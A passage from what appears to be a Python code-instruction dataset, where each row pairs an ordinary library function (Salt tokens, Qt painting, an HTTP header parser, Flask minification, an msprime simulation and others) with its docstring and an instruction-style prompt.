code (string, lengths 75 to 104k) | docstring (string, lengths 1 to 46.9k) | text (string, lengths 164 to 112k) |
---|---|---|
def rm_token(opts, tok):
'''
Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed.
'''
t_path = os.path.join(opts['token_dir'], tok)
try:
os.remove(t_path)
return {}
except (IOError, OSError):
log.warning('Could not remove token %s', tok) | Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed. | Below is the instruction that describes the task:
### Input:
Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed.
### Response:
def rm_token(opts, tok):
'''
Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed.
'''
t_path = os.path.join(opts['token_dir'], tok)
try:
os.remove(t_path)
return {}
except (IOError, OSError):
log.warning('Could not remove token %s', tok) |
def drawBackground( self, painter, opt, rect, brush ):
"""
Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush>
"""
if not brush:
return
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(brush)
painter.drawRect(rect) | Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush> | Below is the instruction that describes the task:
### Input:
Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush>
### Response:
def drawBackground( self, painter, opt, rect, brush ):
"""
Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush>
"""
if not brush:
return
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(brush)
painter.drawRect(rect) |
def random_digit_or_empty(self):
"""
Returns a random digit/number
between 0 and 9 or an empty string.
"""
if self.generator.random.randint(0, 1):
return self.generator.random.randint(0, 9)
else:
return '' | Returns a random digit/number
between 0 and 9 or an empty string. | Below is the instruction that describes the task:
### Input:
Returns a random digit/number
between 0 and 9 or an empty string.
### Response:
def random_digit_or_empty(self):
"""
Returns a random digit/number
between 0 and 9 or an empty string.
"""
if self.generator.random.randint(0, 1):
return self.generator.random.randint(0, 9)
else:
return '' |
def get_distinct_segments(self, left_offset = 0, right_offset = 0, sequence_length = None):
'''Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered.
'''
# Create a unique, sorted list of all loop terminus positions
positions = set()
for l in self.data:
assert(l['start'] <= l['end'])
if sequence_length:
# If we know the sequence length then we can return valid positions
positions = positions.union(range(max(1, l['start'] - left_offset + 1), min(sequence_length + 1, l['end'] + 1 + right_offset - 1))) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python slicing works.
else:
# Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully
positions = positions.union(range(max(1, l['start'] - left_offset + 1), l['end'] + 1 + right_offset - 1)) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python slicing works.
positions = sorted(positions)
# Iterate through the list to define the segments
segments = []
current_start = None
last_position = None
for p in positions:
if current_start == None:
current_start = p
last_position = p
else:
if p == last_position + 1:
last_position = p
else:
segments.append((current_start, last_position))
current_start = p
last_position = p
if current_start and last_position:
segments.append((current_start, last_position))
return segments | Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered. | Below is the instruction that describes the task:
### Input:
Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered.
### Response:
def get_distinct_segments(self, left_offset = 0, right_offset = 0, sequence_length = None):
'''Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered.
'''
# Create a unique, sorted list of all loop terminus positions
positions = set()
for l in self.data:
assert(l['start'] <= l['end'])
if sequence_length:
# If we know the sequence length then we can return valid positions
positions = positions.union(range(max(1, l['start'] - left_offset + 1), min(sequence_length + 1, l['end'] + 1 + right_offset - 1))) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python slicing works.
else:
# Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully
positions = positions.union(range(max(1, l['start'] - left_offset + 1), l['end'] + 1 + right_offset - 1)) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python slicing works.
positions = sorted(positions)
# Iterate through the list to define the segments
segments = []
current_start = None
last_position = None
for p in positions:
if current_start == None:
current_start = p
last_position = p
else:
if p == last_position + 1:
last_position = p
else:
segments.append((current_start, last_position))
current_start = p
last_position = p
if current_start and last_position:
segments.append((current_start, last_position))
return segments |
def set_edges(self, name: str, a: np.ndarray, b: np.ndarray, w: np.ndarray, *, axis: int) -> None:
"""
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
"""
deprecated("'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead")
try:
g = scipy.sparse.coo_matrix((w, (a, b)), (self.shape[axis], self.shape[axis]))
except Exception:
raise ValueError("Input arrays could not be converted to a sparse matrix")
if axis == 0:
self.row_graphs[name] = g
elif axis == 1:
self.col_graphs[name] = g
else:
raise ValueError("axis must be 0 (rows) or 1 (columns)") | **DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead | Below is the the instruction that describes the task:
### Input:
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
### Response:
def set_edges(self, name: str, a: np.ndarray, b: np.ndarray, w: np.ndarray, *, axis: int) -> None:
"""
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
"""
deprecated("'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead")
try:
g = scipy.sparse.coo_matrix((w, (a, b)), (self.shape[axis], self.shape[axis]))
except Exception:
raise ValueError("Input arrays could not be converted to a sparse matrix")
if axis == 0:
self.row_graphs[name] = g
elif axis == 1:
self.col_graphs[name] = g
else:
raise ValueError("axis must be 0 (rows) or 1 (columns)") |
def _validate_checksum(self, buffer):
"""Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool
"""
self._log.debug("Validating the buffer")
if len(buffer) == 0:
self._log.debug("Buffer was empty")
if self._conn.isOpen():
self._log.debug('Closing connection')
self._conn.close()
return False
p0 = hex2int(buffer[0])
p1 = hex2int(buffer[1])
checksum = sum([hex2int(c) for c in buffer[:35]]) & 0xFF
p35 = hex2int(buffer[35])
if p0 != 165 or p1 != 150 or p35 != checksum:
self._log.debug("Buffer checksum was not valid")
return False
return True | Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool | Below is the instruction that describes the task:
### Input:
Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool
### Response:
def _validate_checksum(self, buffer):
"""Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool
"""
self._log.debug("Validating the buffer")
if len(buffer) == 0:
self._log.debug("Buffer was empty")
if self._conn.isOpen():
self._log.debug('Closing connection')
self._conn.close()
return False
p0 = hex2int(buffer[0])
p1 = hex2int(buffer[1])
checksum = sum([hex2int(c) for c in buffer[:35]]) & 0xFF
p35 = hex2int(buffer[35])
if p0 != 165 or p1 != 150 or p35 != checksum:
self._log.debug("Buffer checksum was not valid")
return False
return True |
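A small self-contained sketch of the checksum rule applied above, using a made-up 36-byte frame rather than real serial data: bytes 0 and 1 are the 0xA5/0x96 header and byte 35 must equal the low byte of the sum of bytes 0 through 34.
frame = bytearray([0xA5, 0x96] + [0x01] * 33)  # hypothetical 35-byte header + payload
frame.append(sum(frame) & 0xFF)                # append checksum as byte 35
# Same validation rule as above, on plain integers instead of hex strings.
ok = (frame[0] == 165 and frame[1] == 150 and
      frame[35] == (sum(frame[:35]) & 0xFF))
print(ok)  # True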
def _mergedict(a, b):
"""Recusively merge the 2 dicts.
Destructive on argument 'a'.
"""
for p, d1 in b.items():
if p in a:
if not isinstance(d1, dict):
continue
_mergedict(a[p], d1)
else:
a[p] = d1
return a | Recursively merge the 2 dicts.
Destructive on argument 'a'. | Below is the instruction that describes the task:
### Input:
Recursively merge the 2 dicts.
Destructive on argument 'a'.
### Response:
def _mergedict(a, b):
"""Recusively merge the 2 dicts.
Destructive on argument 'a'.
"""
for p, d1 in b.items():
if p in a:
if not isinstance(d1, dict):
continue
_mergedict(a[p], d1)
else:
a[p] = d1
return a |
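A brief usage sketch for the recursive merge above (assuming _mergedict as defined is in scope, with made-up dicts): nested keys from the second dict are folded into the first, and the first argument is mutated in place.
a = {'db': {'host': 'localhost'}, 'debug': False}
b = {'db': {'port': 5432}, 'extra': 1}
_mergedict(a, b)
print(a)  # {'db': {'host': 'localhost', 'port': 5432}, 'debug': False, 'extra': 1}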
def slicenet_middle(inputs_encoded, targets, target_space_emb, mask, hparams):
"""Middle part of slicenet, connecting encoder and decoder."""
def norm_fn(x, name):
with tf.variable_scope(name, default_name="norm"):
return common_layers.apply_norm(x, hparams.norm_type, hparams.hidden_size,
hparams.norm_epsilon)
# Flatten targets and embed target_space_id.
targets_flat = tf.expand_dims(common_layers.flatten4d3d(targets), axis=2)
target_space_emb = tf.tile(target_space_emb,
[tf.shape(targets_flat)[0], 1, 1, 1])
# Use attention from each target to look at input and retrieve.
targets_shifted = common_layers.shift_right(
targets_flat, pad_value=target_space_emb)
if hparams.attention_type == "none":
targets_with_attention = tf.zeros_like(targets_shifted)
else:
inputs_padding_bias = (1.0 - mask) * -1e9 # Bias to not attend to padding.
targets_with_attention = attention(
targets_shifted,
inputs_encoded,
norm_fn,
hparams,
bias=inputs_padding_bias)
# Positional targets: merge attention and raw.
kernel = (hparams.kernel_height, hparams.kernel_width)
targets_merged = common_layers.subseparable_conv_block(
tf.concat([targets_with_attention, targets_shifted], axis=3),
hparams.hidden_size, [((1, 1), kernel)],
normalizer_fn=norm_fn,
padding="LEFT",
separability=4,
name="targets_merge")
return targets_merged, 0.0 | Middle part of slicenet, connecting encoder and decoder. | Below is the instruction that describes the task:
### Input:
Middle part of slicenet, connecting encoder and decoder.
### Response:
def slicenet_middle(inputs_encoded, targets, target_space_emb, mask, hparams):
"""Middle part of slicenet, connecting encoder and decoder."""
def norm_fn(x, name):
with tf.variable_scope(name, default_name="norm"):
return common_layers.apply_norm(x, hparams.norm_type, hparams.hidden_size,
hparams.norm_epsilon)
# Flatten targets and embed target_space_id.
targets_flat = tf.expand_dims(common_layers.flatten4d3d(targets), axis=2)
target_space_emb = tf.tile(target_space_emb,
[tf.shape(targets_flat)[0], 1, 1, 1])
# Use attention from each target to look at input and retrieve.
targets_shifted = common_layers.shift_right(
targets_flat, pad_value=target_space_emb)
if hparams.attention_type == "none":
targets_with_attention = tf.zeros_like(targets_shifted)
else:
inputs_padding_bias = (1.0 - mask) * -1e9 # Bias to not attend to padding.
targets_with_attention = attention(
targets_shifted,
inputs_encoded,
norm_fn,
hparams,
bias=inputs_padding_bias)
# Positional targets: merge attention and raw.
kernel = (hparams.kernel_height, hparams.kernel_width)
targets_merged = common_layers.subseparable_conv_block(
tf.concat([targets_with_attention, targets_shifted], axis=3),
hparams.hidden_size, [((1, 1), kernel)],
normalizer_fn=norm_fn,
padding="LEFT",
separability=4,
name="targets_merge")
return targets_merged, 0.0 |
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because web browsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length) | Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because web browsers do not provide
this value. | Below is the instruction that describes the task:
### Input:
Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because web browsers do not provide
this value.
### Response:
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because web browsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length) |
def update_user(self, username, profile, owner_privkey):
"""
Update profile_hash on blockchain
"""
url = self.base_url + "/users/" + username + "/update"
owner_pubkey = get_pubkey_from_privkey(owner_privkey)
payload = {
'profile': profile,
'owner_pubkey': owner_pubkey
}
resp = self._post_request(url, payload)
try:
unsigned_tx = resp['unsigned_tx']
except:
return resp
dht_resp = write_dht_profile(profile)
dht_resp = dht_resp[0]
if not dht_resp['status'] == 'success':
return {"error": "DHT write failed"}
# sign all unsigned inputs
signed_tx = sign_all_unsigned_inputs(owner_privkey, unsigned_tx)
return self.broadcast_transaction(signed_tx) | Update profile_hash on blockchain | Below is the instruction that describes the task:
### Input:
Update profile_hash on blockchain
### Response:
def update_user(self, username, profile, owner_privkey):
"""
Update profile_hash on blockchain
"""
url = self.base_url + "/users/" + username + "/update"
owner_pubkey = get_pubkey_from_privkey(owner_privkey)
payload = {
'profile': profile,
'owner_pubkey': owner_pubkey
}
resp = self._post_request(url, payload)
try:
unsigned_tx = resp['unsigned_tx']
except:
return resp
dht_resp = write_dht_profile(profile)
dht_resp = dht_resp[0]
if not dht_resp['status'] == 'success':
return {"error": "DHT write failed"}
# sign all unsigned inputs
signed_tx = sign_all_unsigned_inputs(owner_privkey, unsigned_tx)
return self.broadcast_transaction(signed_tx) |
def update(self, id, **dict):
'''Update a given item with the passed data.'''
if not self._item_path:
raise AttributeError('update is not available for %s' % self._item_name)
target = (self._update_path or self._item_path) % id
payload = json.dumps({self._item_type:dict})
self._redmine.put(target, payload)
return None | Update a given item with the passed data. | Below is the instruction that describes the task:
### Input:
Update a given item with the passed data.
### Response:
def update(self, id, **dict):
'''Update a given item with the passed data.'''
if not self._item_path:
raise AttributeError('update is not available for %s' % self._item_name)
target = (self._update_path or self._item_path) % id
payload = json.dumps({self._item_type:dict})
self._redmine.put(target, payload)
return None |
def _bell(self):
u'''ring the bell if requested.'''
if self.bell_style == u'none':
pass
elif self.bell_style == u'visible':
raise NotImplementedError(u"Bellstyle visible is not implemented yet.")
elif self.bell_style == u'audible':
self.console.bell()
else:
raise ReadlineError(u"Bellstyle %s unknown."%self.bell_style) | u'''ring the bell if requested. | Below is the the instruction that describes the task:
### Input:
u'''ring the bell if requested.
### Response:
def _bell(self):
u'''ring the bell if requested.'''
if self.bell_style == u'none':
pass
elif self.bell_style == u'visible':
raise NotImplementedError(u"Bellstyle visible is not implemented yet.")
elif self.bell_style == u'audible':
self.console.bell()
else:
raise ReadlineError(u"Bellstyle %s unknown."%self.bell_style) |
def _read_http_header(self, header):
"""Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS
"""
try:
startline, headerfield = header.split(b'\r\n', 1)
para1, para2, para3 = re.split(rb'\s+', startline, 2)
fields = headerfield.split(b'\r\n')
lists = (re.split(rb'\s*:\s*', field, 1) for field in fields)
except ValueError:
raise ProtocolError('HTTP: invalid format', quiet=True)
match1 = re.match(_RE_METHOD, para1)
match2 = re.match(_RE_VERSION, para3)
match3 = re.match(_RE_VERSION, para1)
match4 = re.match(_RE_STATUS, para2)
if match1 and match2:
receipt = 'request'
header = dict(
request=dict(
method=self.decode(para1),
target=self.decode(para2),
version=self.decode(match2.group('version')),
),
)
elif match3 and match4:
receipt = 'response'
header = dict(
response=dict(
version=self.decode(match3.group('version')),
status=int(para2),
phrase=self.decode(para3),
),
)
else:
raise ProtocolError('HTTP: invalid format', quiet=True)
try:
for item in lists:
key = self.decode(item[0].strip()).replace(receipt, f'{receipt}_field')
value = self.decode(item[1].strip())
if key in header:
if isinstance(header[key], tuple):
header[key] += (value,)
else:
header[key] = (header[key], value)
else:
header[key] = value
except IndexError:
raise ProtocolError('HTTP: invalid format', quiet=True)
return header, receipt | Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS | Below is the instruction that describes the task:
### Input:
Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS
### Response:
def _read_http_header(self, header):
"""Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS
"""
try:
startline, headerfield = header.split(b'\r\n', 1)
para1, para2, para3 = re.split(rb'\s+', startline, 2)
fields = headerfield.split(b'\r\n')
lists = (re.split(rb'\s*:\s*', field, 1) for field in fields)
except ValueError:
raise ProtocolError('HTTP: invalid format', quiet=True)
match1 = re.match(_RE_METHOD, para1)
match2 = re.match(_RE_VERSION, para3)
match3 = re.match(_RE_VERSION, para1)
match4 = re.match(_RE_STATUS, para2)
if match1 and match2:
receipt = 'request'
header = dict(
request=dict(
method=self.decode(para1),
target=self.decode(para2),
version=self.decode(match2.group('version')),
),
)
elif match3 and match4:
receipt = 'response'
header = dict(
response=dict(
version=self.decode(match3.group('version')),
status=int(para2),
phrase=self.decode(para3),
),
)
else:
raise ProtocolError('HTTP: invalid format', quiet=True)
try:
for item in lists:
key = self.decode(item[0].strip()).replace(receipt, f'{receipt}_field')
value = self.decode(item[1].strip())
if key in header:
if isinstance(header[key], tuple):
header[key] += (value,)
else:
header[key] = (header[key], value)
else:
header[key] = value
except IndexError:
raise ProtocolError('HTTP: invalid format', quiet=True)
return header, receipt |
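The splitting strategy used above can be illustrated on a made-up raw request; this self-contained sketch uses plain bytes.decode() in place of the class helper and skips the method/version regex checks, so it only shows the start-line and field parsing.
import re
raw = b'GET /index.html HTTP/1.1\r\nHost: example.com\r\nAccept: text/html\r\n'
startline, headerfield = raw.split(b'\r\n', 1)
method, target, version = re.split(rb'\s+', startline, 2)
fields = [f for f in headerfield.split(b'\r\n') if f]
pairs = [re.split(rb'\s*:\s*', f, 1) for f in fields]
header = {k.decode(): v.decode() for k, v in pairs}
print(method, target, version)  # b'GET' b'/index.html' b'HTTP/1.1'
print(header)                   # {'Host': 'example.com', 'Accept': 'text/html'}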
def _get_block(self):
"""Just read a single block from your current location in _fh"""
b = self._fh.read(4) # get block size bytes
#print self._fh.tell()
if not b: raise StopIteration
block_size = struct.unpack('<i',b)[0]
return self._fh.read(block_size) | Just read a single block from your current location in _fh | Below is the instruction that describes the task:
### Input:
Just read a single block from your current location in _fh
### Response:
def _get_block(self):
"""Just read a single block from your current location in _fh"""
b = self._fh.read(4) # get block size bytes
#print self._fh.tell()
if not b: raise StopIteration
block_size = struct.unpack('<i',b)[0]
return self._fh.read(block_size) |
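A minimal sketch of the length-prefixed framing that _get_block relies on, using an in-memory BytesIO stream in place of the object's _fh; the 4-byte little-endian size header is packed with the same '<i' struct format that is unpacked above.
import io
import struct

payload = b'hello block'
stream = io.BytesIO(struct.pack('<i', len(payload)) + payload)
size_bytes = stream.read(4)                 # 4-byte little-endian length prefix
block_size = struct.unpack('<i', size_bytes)[0]
print(block_size, stream.read(block_size))  # 11 b'hello block'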
def response_minify(self, response):
"""
minify response html to decrease traffic
"""
if response.content_type == u'text/html; charset=utf-8':
endpoint = request.endpoint or ''
view_func = current_app.view_functions.get(endpoint, None)
name = (
'%s.%s' % (view_func.__module__, view_func.__name__)
if view_func else ''
)
if name in self._exempt_routes:
return response
response.direct_passthrough = False
response.set_data(
self._html_minify.minify(response.get_data(as_text=True))
)
return response
return response | minify response html to decrease traffic | Below is the instruction that describes the task:
### Input:
minify response html to decrease traffic
### Response:
def response_minify(self, response):
"""
minify response html to decrease traffic
"""
if response.content_type == u'text/html; charset=utf-8':
endpoint = request.endpoint or ''
view_func = current_app.view_functions.get(endpoint, None)
name = (
'%s.%s' % (view_func.__module__, view_func.__name__)
if view_func else ''
)
if name in self._exempt_routes:
return response
response.direct_passthrough = False
response.set_data(
self._html_minify.minify(response.get_data(as_text=True))
)
return response
return response |
def _simulate(self, nreps, admix=None, Ns=500000, gen=20):
"""
Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
reference by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long.
"""
## node ages
Taus = np.array(list(set(self.verts[:, 1]))) * 1e4 * gen
## The tips samples, ordered alphanumerically
## Population IDs correspond to their indexes in pop config
ntips = len(self.tree)
#names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}
## rev ladderized leaf name order (left to right on downward facing tree)
names = {name: idx for idx, name in enumerate(self.tree.get_leaf_names()[::-1])}
pop_config = [
ms.PopulationConfiguration(sample_size=2, initial_size=Ns)
for i in range(ntips)
]
## migration matrix all zeros init
migmat = np.zeros((ntips, ntips)).tolist()
## a list for storing demographic events
demog = []
## coalescent times
coals = sorted(list(set(self.verts[:, 1])))[1:]
for ct in xrange(len(coals)):
## check for admix event before next coalescence
## ...
## print coals[ct], nidxs, time
nidxs = np.where(self.verts[:, 1] == coals[ct])[0]
time = Taus[ct+1]
## add coalescence at each node
for nidx in nidxs:
node = self.tree.search_nodes(name=str(nidx))[0]
## get destination (lowest child idx number), and other
dest = sorted(node.get_leaves(), key=lambda x: x.idx)[0]
otherchild = [i for i in node.children if not
i.get_leaves_by_name(dest.name)][0]
## get source
if otherchild.is_leaf():
source = otherchild
else:
source = sorted(otherchild.get_leaves(), key=lambda x: x.idx)[0]
## add coal events
event = ms.MassMigration(
time=int(time),
source=names[source.name],
destination=names[dest.name],
proportion=1.0)
#print(int(time), names[source.name], names[dest.name])
## ...
demog.append(event)
## sim the data
replicates = ms.simulate(
population_configurations=pop_config,
migration_matrix=migmat,
demographic_events=demog,
num_replicates=nreps,
length=100,
mutation_rate=1e-8)
return replicates | Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
referenced by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long. | Below is the instruction that describes the task:
### Input:
Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
referenced by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long.
### Response:
def _simulate(self, nreps, admix=None, Ns=500000, gen=20):
"""
Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
referenced by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long.
"""
## node ages
Taus = np.array(list(set(self.verts[:, 1]))) * 1e4 * gen
## The tips samples, ordered alphanumerically
## Population IDs correspond to their indexes in pop config
ntips = len(self.tree)
#names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}
## rev ladderized leaf name order (left to right on downward facing tree)
names = {name: idx for idx, name in enumerate(self.tree.get_leaf_names()[::-1])}
pop_config = [
ms.PopulationConfiguration(sample_size=2, initial_size=Ns)
for i in range(ntips)
]
## migration matrix all zeros init
migmat = np.zeros((ntips, ntips)).tolist()
## a list for storing demographic events
demog = []
## coalescent times
coals = sorted(list(set(self.verts[:, 1])))[1:]
for ct in xrange(len(coals)):
## check for admix event before next coalescence
## ...
## print coals[ct], nidxs, time
nidxs = np.where(self.verts[:, 1] == coals[ct])[0]
time = Taus[ct+1]
## add coalescence at each node
for nidx in nidxs:
node = self.tree.search_nodes(name=str(nidx))[0]
## get destination (lowest child idx number), and other
dest = sorted(node.get_leaves(), key=lambda x: x.idx)[0]
otherchild = [i for i in node.children if not
i.get_leaves_by_name(dest.name)][0]
## get source
if otherchild.is_leaf():
source = otherchild
else:
source = sorted(otherchild.get_leaves(), key=lambda x: x.idx)[0]
## add coal events
event = ms.MassMigration(
time=int(time),
source=names[source.name],
destination=names[dest.name],
proportion=1.0)
#print(int(time), names[source.name], names[dest.name])
## ...
demog.append(event)
## sim the data
replicates = ms.simulate(
population_configurations=pop_config,
migration_matrix=migmat,
demographic_events=demog,
num_replicates=nreps,
length=100,
mutation_rate=1e-8)
return replicates |
def quote_completions(self, completions, cword_prequote, last_wordbreak_pos):
"""
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
